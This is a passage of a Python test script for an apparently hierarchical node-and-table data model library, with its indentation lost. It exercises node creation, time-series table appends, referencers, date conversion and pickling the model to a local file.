statusNode = m.get_node("root.folder1.delayFunction.status")
progressNode = m.get_node("root.folder1.delayFunction.progress")
while(statusNode.get_value()!="finished"):
print("progress is",progressNode.get_value())
time.sleep(0.3)
print("execution re===================")
m.show()
def getnodetest():
m=Model()
m.create_node("root", name="folder1")
m.create_node("root.folder1", name="folder2")
m.create_node("root.folder1", name="myvar", type="variable")
myvar = m.get_node("root.folder1.myvar")
myvar.set_value(33)
print("value",myvar.get_value())
def testfunctions_test():
m = Model()
m.create_test(1)
m.show()
table= m.get_timeseries_table(["root.variables.f0","root.variables.f1","root.variables.time"],noBins=25)
print("shape",table.shape)
for row in table.T:
for elem in row:
print(str("%3.7f"%elem)," ",end="")
print("")
def time_conver_test():
d1=datetime.datetime(2018,1,1,0,0,0,tzinfo = pytz.UTC)
print(d1)
s1 = date2secs(d1)
print(s1)
d2 = secs2date(s1)
print(d2)
d3 ="2018-01-01T00:10:08.445+02:00"
print(d3)
d4=dateutil.parser.parse(d3)
print(d4)
s4=date2secs(d4)
print(s4)
d5=secs2date(s4)
print(d5)
def table_test():
m=Model()
print("this test creates a table and writes some data in")
template = [
{
"name": "type",
"type": "const",
"value": "timeSeriesTable"
},
{
"name":"description",
"type": "const",
"value": "this is a great table"
},
{
"name":"data",
"type":"folder",
"children":[
{"name":"var1","type": "column","value":[]},
{"name":"var2","type": "column","value":[]},
{"name":"var3","type": "column","value":[]},
{"name":"time","type": "column","value":[]}
]
},
{
"name":"columns",
"type": "referencer",
"forwardRefs": ['.data.var1', '.data.var2', '.data.var3',".data.time"]
},
{
"name":"timeField",
"type": "referencer",
"forwardRefs":['.data.time']
},
{
"name": "numberOfRows",
"type": "variable",
"value":0
}
]
m.create_node("root", name="mytable",type="table")
m.create_nodes_from_template("root.mytable",template=template)
m.show()
#now write some data with autocreates
mytime = datetime.datetime.now(pytz.timezone("CET"))
myepoch=date2secs(mytime)
blob = {"root.mytable.data.var1":1,"root.mytable.data.var2":2,"root.mytable.data.time":myepoch,"root.mytable.data.newvar":99}
m.append_table(blob)
m.show()
#now add more data but leave out var
blob = {"root.mytable.data.var1": 10, "root.mytable.data.var2": 20, "root.mytable.data.time": myepoch}
m.append_table(blob)
blob = {"root.mytable.data.var1": 10, "root.mytable.data.var2": 20, "root.mytable.data.var4": 4, "root.mytable.data.time": myepoch}
m.append_table(blob)
m.show()
def test_table_autocreate():
mytime = datetime.datetime.now(pytz.timezone("CET"))
myepoch=date2secs(mytime)
blob = {"root.data.var1":1,"root.data.var2":2,"root.folder.time":myepoch,"root.data.newvar":99}
m=Model()
m.append_table(blob)
m.show()
def test_create_from_path():
m=Model()
m.create_node_from_path("root.myfolder.myfolder2.var",{"type":"variable","value":33})
m.show()
def test_get_children():
m=Model()
m.create_test()
nodes = m.get_node_with_children('root.folder2')
#lastnode = '10'
#print(m.get_path(lastnode))
print(json.dumps(nodes,indent=4))
def test_create():
m=Model()
m.create_test(1)
m.show()
def test_get_forwards():#
#in this test, we check the forwards get results over folders, referencers etc.
m=Model()
m.create_node_from_path("root.folder.var1",{"type":"variable"})
m.create_node_from_path("root.folder.var2", {"type": "variable"})
m.create_node_from_path("root.folder.var3", {"type": "variable"})
m.create_node_from_path("root.ref1", {"type": "referencer"})
m.create_node_from_path("root.ref2", {"type": "referencer"})
m.add_forward_refs("root.ref1",["root.folder"])
m.add_forward_refs("root.ref2", ["root.ref1"])
m.show()
res=m.get_leaves("root.ref1")
print(res)
for k in res:
print(k["name"])
res = m.get_leaves("root.ref2")
for k in res:
print(k["name"])
def pickle_save():
import pickle
m=Model()
m.create_test(2)
# write python dict to a file
output = open('pickle_save.pkl', 'wb')
pickle.dump(m.get_model(), output)
output.close()
n=Model()
# read python dict back from the file
pkl_file = open('pickle_save.pkl', 'rb')
restore = pickle.load(pkl_file)
pkl_file.close()
print("compare after pickle restre",restore==m.get_model())
if __name__ == '__main__':
#############
#test1()
#ts_test1()
#test_template()
save_test()
pickle_save()
#plugintest()
#getnodetest()
#table_query_test()
#testfunctions_test()
#time_conver_test()
#test_create_from_path()
#table_test()
#test_table_autocreate()
#test_get_children()
#test_get_forwards()
#test_create()
#read in the commmand line options:
# demo1: create the test for the demo1, and store it in file (option2)
#
if len(sys.argv) > 1:
if sys.argv[1] == "demo1":
fileName = sys.argv[2]
print("creating demo and save as ",fileName)
m = Model()
m.create_test()
m.show()
m.save(fileName)